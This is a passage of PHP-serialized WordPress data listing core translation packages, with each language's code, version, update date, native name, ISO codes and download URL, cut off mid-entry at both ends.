03:13:47\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/da_DK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"da\";i:2;s:3:\"dan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsæt\";}}s:5:\"de_AT\";a:8:{s:8:\"language\";s:5:\"de_AT\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2025-10-23 12:01:47\";s:12:\"english_name\";s:16:\"German (Austria)\";s:11:\"native_name\";s:21:\"Deutsch (Österreich)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/de_AT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_DE\";a:8:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-04-02 20:12:09\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/de_DE.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:12:\"de_DE_formal\";a:8:{s:8:\"language\";s:12:\"de_DE_formal\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-04-02 20:11:34\";s:12:\"english_name\";s:15:\"German (Formal)\";s:11:\"native_name\";s:13:\"Deutsch (Sie)\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/translation/core/6.9.4/de_DE_formal.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_CH\";a:8:{s:8:\"language\";s:5:\"de_CH\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2025-11-28 08:11:27\";s:12:\"english_name\";s:20:\"German (Switzerland)\";s:11:\"native_name\";s:17:\"Deutsch (Schweiz)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/de_CH.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:14:\"de_CH_informal\";a:8:{s:8:\"language\";s:14:\"de_CH_informal\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2025-11-28 08:08:17\";s:12:\"english_name\";s:30:\"German (Switzerland, Informal)\";s:11:\"native_name\";s:21:\"Deutsch (Schweiz, Du)\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/translation/core/6.9.4/de_CH_informal.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:3:\"dsb\";a:8:{s:8:\"language\";s:3:\"dsb\";s:7:\"version\";s:5:\"6.2.9\";s:7:\"updated\";s:19:\"2022-07-16 12:13:09\";s:12:\"english_name\";s:13:\"Lower Sorbian\";s:11:\"native_name\";s:16:\"Dolnoserbšćina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.2.9/dsb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"dsb\";i:3;s:3:\"dsb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Dalej\";}}s:3:\"dzo\";a:8:{s:8:\"language\";s:3:\"dzo\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-06-29 08:59:03\";s:12:\"english_name\";s:8:\"Dzongkha\";s:11:\"native_name\";s:18:\"རྫོང་ཁ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/dzo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"dz\";i:2;s:3:\"dzo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"el\";a:8:{s:8:\"language\";s:2:\"el\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-02 11:19:29\";s:12:\"english_name\";s:5:\"Greek\";s:11:\"native_name\";s:16:\"Ελληνικά\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/el.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"el\";i:2;s:3:\"ell\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Συνέχεια\";}}s:5:\"en_NZ\";a:8:{s:8:\"language\";s:5:\"en_NZ\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2025-12-24 12:51:19\";s:12:\"english_name\";s:21:\"English (New Zealand)\";s:11:\"native_name\";s:21:\"English (New Zealand)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/en_NZ.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_CA\";a:8:{s:8:\"language\";s:5:\"en_CA\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-27 20:40:38\";s:12:\"english_name\";s:16:\"English (Canada)\";s:11:\"native_name\";s:16:\"English (Canada)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/en_CA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_GB\";a:8:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2025-12-30 11:47:57\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/en_GB.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_AU\";a:8:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-18 19:42:42\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/en_AU.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_ZA\";a:8:{s:8:\"language\";s:5:\"en_ZA\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-26 14:31:13\";s:12:\"english_name\";s:22:\"English (South Africa)\";s:11:\"native_name\";s:22:\"English (South Africa)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/en_ZA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"eo\";a:8:{s:8:\"language\";s:2:\"eo\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-30 09:38:37\";s:12:\"english_name\";s:9:\"Esperanto\";s:11:\"native_name\";s:9:\"Esperanto\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/eo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eo\";i:2;s:3:\"epo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Daŭrigi\";}}s:5:\"es_CL\";a:8:{s:8:\"language\";s:5:\"es_CL\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-11 00:33:09\";s:12:\"english_name\";s:15:\"Spanish (Chile)\";s:11:\"native_name\";s:17:\"Español de Chile\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/es_CL.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_AR\";a:8:{s:8:\"language\";s:5:\"es_AR\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-28 03:02:20\";s:12:\"english_name\";s:19:\"Spanish (Argentina)\";s:11:\"native_name\";s:21:\"Español de Argentina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/es_AR.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_MX\";a:8:{s:8:\"language\";s:5:\"es_MX\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-04-01 22:19:48\";s:12:\"english_name\";s:16:\"Spanish (Mexico)\";s:11:\"native_name\";s:19:\"Español de México\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/es_MX.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CR\";a:8:{s:8:\"language\";s:5:\"es_CR\";s:7:\"version\";s:3:\"6.9\";s:7:\"updated\";s:19:\"2025-10-01 22:54:47\";s:12:\"english_name\";s:20:\"Spanish (Costa Rica)\";s:11:\"native_name\";s:22:\"Español de Costa Rica\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.9/es_CR.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_PE\";a:8:{s:8:\"language\";s:5:\"es_PE\";s:7:\"version\";s:6:\"6.9-RC\";s:7:\"updated\";s:19:\"2024-10-16 21:04:12\";s:12:\"english_name\";s:14:\"Spanish (Peru)\";s:11:\"native_name\";s:17:\"Español de Perú\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.9-RC/es_PE.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_VE\";a:8:{s:8:\"language\";s:5:\"es_VE\";s:7:\"version\";s:5:\"6.4.8\";s:7:\"updated\";s:19:\"2023-10-16 16:00:04\";s:12:\"english_name\";s:19:\"Spanish (Venezuela)\";s:11:\"native_name\";s:21:\"Español de Venezuela\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.4.8/es_VE.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_EC\";a:8:{s:8:\"language\";s:5:\"es_EC\";s:7:\"version\";s:5:\"6.2.9\";s:7:\"updated\";s:19:\"2023-04-21 13:32:10\";s:12:\"english_name\";s:17:\"Spanish (Ecuador)\";s:11:\"native_name\";s:19:\"Español de Ecuador\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.2.9/es_EC.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_DO\";a:8:{s:8:\"language\";s:5:\"es_DO\";s:7:\"version\";s:6:\"5.8.13\";s:7:\"updated\";s:19:\"2021-10-08 14:32:50\";s:12:\"english_name\";s:28:\"Spanish (Dominican Republic)\";s:11:\"native_name\";s:33:\"Español de República Dominicana\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.8.13/es_DO.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_UY\";a:8:{s:8:\"language\";s:5:\"es_UY\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-03-31 18:33:26\";s:12:\"english_name\";s:17:\"Spanish (Uruguay)\";s:11:\"native_name\";s:19:\"Español de Uruguay\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/es_UY.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_PR\";a:8:{s:8:\"language\";s:5:\"es_PR\";s:7:\"version\";s:6:\"5.4.19\";s:7:\"updated\";s:19:\"2020-04-29 15:36:59\";s:12:\"english_name\";s:21:\"Spanish (Puerto Rico)\";s:11:\"native_name\";s:23:\"Español de Puerto Rico\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.4.19/es_PR.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_GT\";a:8:{s:8:\"language\";s:5:\"es_GT\";s:7:\"version\";s:6:\"5.2.23\";s:7:\"updated\";s:19:\"2019-03-02 06:35:01\";s:12:\"english_name\";s:19:\"Spanish (Guatemala)\";s:11:\"native_name\";s:21:\"Español de Guatemala\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.2.23/es_GT.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_CO\";a:8:{s:8:\"language\";s:5:\"es_CO\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-18 00:34:47\";s:12:\"english_name\";s:18:\"Spanish (Colombia)\";s:11:\"native_name\";s:20:\"Español de Colombia\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/es_CO.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"es_ES\";a:8:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-28 00:00:14\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/es_ES.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"es\";i:2;s:3:\"spa\";i:3;s:3:\"spa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"et\";a:8:{s:8:\"language\";s:2:\"et\";s:7:\"version\";s:5:\"6.5.7\";s:7:\"updated\";s:19:\"2024-06-06 09:50:37\";s:12:\"english_name\";s:8:\"Estonian\";s:11:\"native_name\";s:5:\"Eesti\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.5.7/et.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"et\";i:2;s:3:\"est\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Jätka\";}}s:2:\"eu\";a:8:{s:8:\"language\";s:2:\"eu\";s:7:\"version\";s:6:\"6.9-RC\";s:7:\"updated\";s:19:\"2025-11-05 21:53:17\";s:12:\"english_name\";s:6:\"Basque\";s:11:\"native_name\";s:7:\"Euskara\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.9-RC/eu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"eu\";i:2;s:3:\"eus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Jarraitu\";}}s:5:\"fa_IR\";a:8:{s:8:\"language\";s:5:\"fa_IR\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2025-12-25 18:17:43\";s:12:\"english_name\";s:7:\"Persian\";s:11:\"native_name\";s:10:\"فارسی\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/fa_IR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:5:\"fa_AF\";a:8:{s:8:\"language\";s:5:\"fa_AF\";s:7:\"version\";s:6:\"6.9-RC\";s:7:\"updated\";s:19:\"2025-02-14 17:29:08\";s:12:\"english_name\";s:21:\"Persian (Afghanistan)\";s:11:\"native_name\";s:31:\"(فارسی (افغانستان\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/6.9-RC/fa_AF.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fa\";i:2;s:3:\"fas\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:2:\"fi\";a:8:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-03 18:15:59\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/fi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fi\";i:2;s:3:\"fin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Jatka\";}}s:5:\"fr_CA\";a:8:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2025-10-03 04:54:28\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/fr_CA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fr\";i:2;s:3:\"fra\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:5:\"fr_FR\";a:8:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-28 11:37:15\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/fr_FR.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"fr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:5:\"fr_BE\";a:8:{s:8:\"language\";s:5:\"fr_BE\";s:7:\"version\";s:5:\"6.5.8\";s:7:\"updated\";s:19:\"2024-02-01 23:56:53\";s:12:\"english_name\";s:16:\"French (Belgium)\";s:11:\"native_name\";s:21:\"Français de Belgique\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.5.8/fr_BE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fr\";i:2;s:3:\"fra\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuer\";}}s:3:\"fur\";a:8:{s:8:\"language\";s:3:\"fur\";s:7:\"version\";s:6:\"4.8.27\";s:7:\"updated\";s:19:\"2025-12-20 19:08:53\";s:12:\"english_name\";s:8:\"Friulian\";s:11:\"native_name\";s:8:\"Friulian\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.8.27/fur.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"fur\";i:3;s:3:\"fur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"fy\";a:8:{s:8:\"language\";s:2:\"fy\";s:7:\"version\";s:5:\"6.2.9\";s:7:\"updated\";s:19:\"2025-10-21 16:35:04\";s:12:\"english_name\";s:7:\"Frisian\";s:11:\"native_name\";s:5:\"Frysk\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.2.9/fy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"fy\";i:2;s:3:\"fry\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Trochgean\";}}s:2:\"gd\";a:8:{s:8:\"language\";s:2:\"gd\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-08-23 17:41:37\";s:12:\"english_name\";s:15:\"Scottish Gaelic\";s:11:\"native_name\";s:9:\"Gàidhlig\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/gd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"gd\";i:2;s:3:\"gla\";i:3;s:3:\"gla\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"Lean air adhart\";}}s:5:\"gl_ES\";a:8:{s:8:\"language\";s:5:\"gl_ES\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-01 13:15:26\";s:12:\"english_name\";s:8:\"Galician\";s:11:\"native_name\";s:6:\"Galego\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/gl_ES.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gl\";i:2;s:3:\"glg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:2:\"gu\";a:8:{s:8:\"language\";s:2:\"gu\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-16 17:02:55\";s:12:\"english_name\";s:8:\"Gujarati\";s:11:\"native_name\";s:21:\"ગુજરાતી\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/gu.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"gu\";i:2;s:3:\"guj\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"ચાલુ રાખો\";}}s:3:\"haz\";a:8:{s:8:\"language\";s:3:\"haz\";s:7:\"version\";s:6:\"4.4.34\";s:7:\"updated\";s:19:\"2015-12-05 00:59:09\";s:12:\"english_name\";s:8:\"Hazaragi\";s:11:\"native_name\";s:15:\"هزاره گی\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.4.34/haz.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"haz\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"ادامه\";}}s:5:\"he_IL\";a:8:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"6.2.9\";s:7:\"updated\";s:19:\"2024-05-04 18:39:24\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.2.9/he_IL.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"he\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"המשך\";}}s:5:\"hi_IN\";a:8:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"6.4.8\";s:7:\"updated\";s:19:\"2025-02-06 05:17:11\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.4.8/hi_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hi\";i:2;s:3:\"hin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"जारी रखें\";}}s:2:\"hr\";a:8:{s:8:\"language\";s:2:\"hr\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-01-31 09:13:17\";s:12:\"english_name\";s:8:\"Croatian\";s:11:\"native_name\";s:8:\"Hrvatski\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/hr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hr\";i:2;s:3:\"hrv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:3:\"hsb\";a:8:{s:8:\"language\";s:3:\"hsb\";s:7:\"version\";s:5:\"6.2.9\";s:7:\"updated\";s:19:\"2023-02-22 17:37:32\";s:12:\"english_name\";s:13:\"Upper Sorbian\";s:11:\"native_name\";s:17:\"Hornjoserbšćina\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.2.9/hsb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"hsb\";i:3;s:3:\"hsb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:4:\"Dale\";}}s:5:\"hu_HU\";a:8:{s:8:\"language\";s:5:\"hu_HU\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-01-26 09:03:23\";s:12:\"english_name\";s:9:\"Hungarian\";s:11:\"native_name\";s:6:\"Magyar\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/hu_HU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hu\";i:2;s:3:\"hun\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Folytatás\";}}s:2:\"hy\";a:8:{s:8:\"language\";s:2:\"hy\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-12-03 16:21:10\";s:12:\"english_name\";s:8:\"Armenian\";s:11:\"native_name\";s:14:\"Հայերեն\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/hy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"hy\";i:2;s:3:\"hye\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Շարունակել\";}}s:5:\"id_ID\";a:8:{s:8:\"language\";s:5:\"id_ID\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-11 02:15:15\";s:12:\"english_name\";s:10:\"Indonesian\";s:11:\"native_name\";s:16:\"Bahasa Indonesia\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/id_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"id\";i:2;s:3:\"ind\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Lanjutkan\";}}s:5:\"is_IS\";a:8:{s:8:\"language\";s:5:\"is_IS\";s:7:\"version\";s:6:\"4.9.28\";s:7:\"updated\";s:19:\"2018-12-11 10:40:02\";s:12:\"english_name\";s:9:\"Icelandic\";s:11:\"native_name\";s:9:\"Íslenska\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.9.28/is_IS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"is\";i:2;s:3:\"isl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Áfram\";}}s:5:\"it_IT\";a:8:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-04-02 17:11:28\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/it_IT.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"it\";i:2;s:3:\"ita\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:2:\"ja\";a:8:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-04-02 15:40:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/ja.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"ja\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"次へ\";}}s:5:\"jv_ID\";a:8:{s:8:\"language\";s:5:\"jv_ID\";s:7:\"version\";s:6:\"4.9.28\";s:7:\"updated\";s:19:\"2019-02-16 23:58:56\";s:12:\"english_name\";s:8:\"Javanese\";s:11:\"native_name\";s:9:\"Basa Jawa\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.9.28/jv_ID.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"jv\";i:2;s:3:\"jav\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Nerusaké\";}}s:5:\"ka_GE\";a:8:{s:8:\"language\";s:5:\"ka_GE\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-04-01 10:56:02\";s:12:\"english_name\";s:8:\"Georgian\";s:11:\"native_name\";s:21:\"ქართული\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/ka_GE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ka\";i:2;s:3:\"kat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"გაგრძელება\";}}s:3:\"kab\";a:8:{s:8:\"language\";s:3:\"kab\";s:7:\"version\";s:5:\"6.2.9\";s:7:\"updated\";s:19:\"2023-07-05 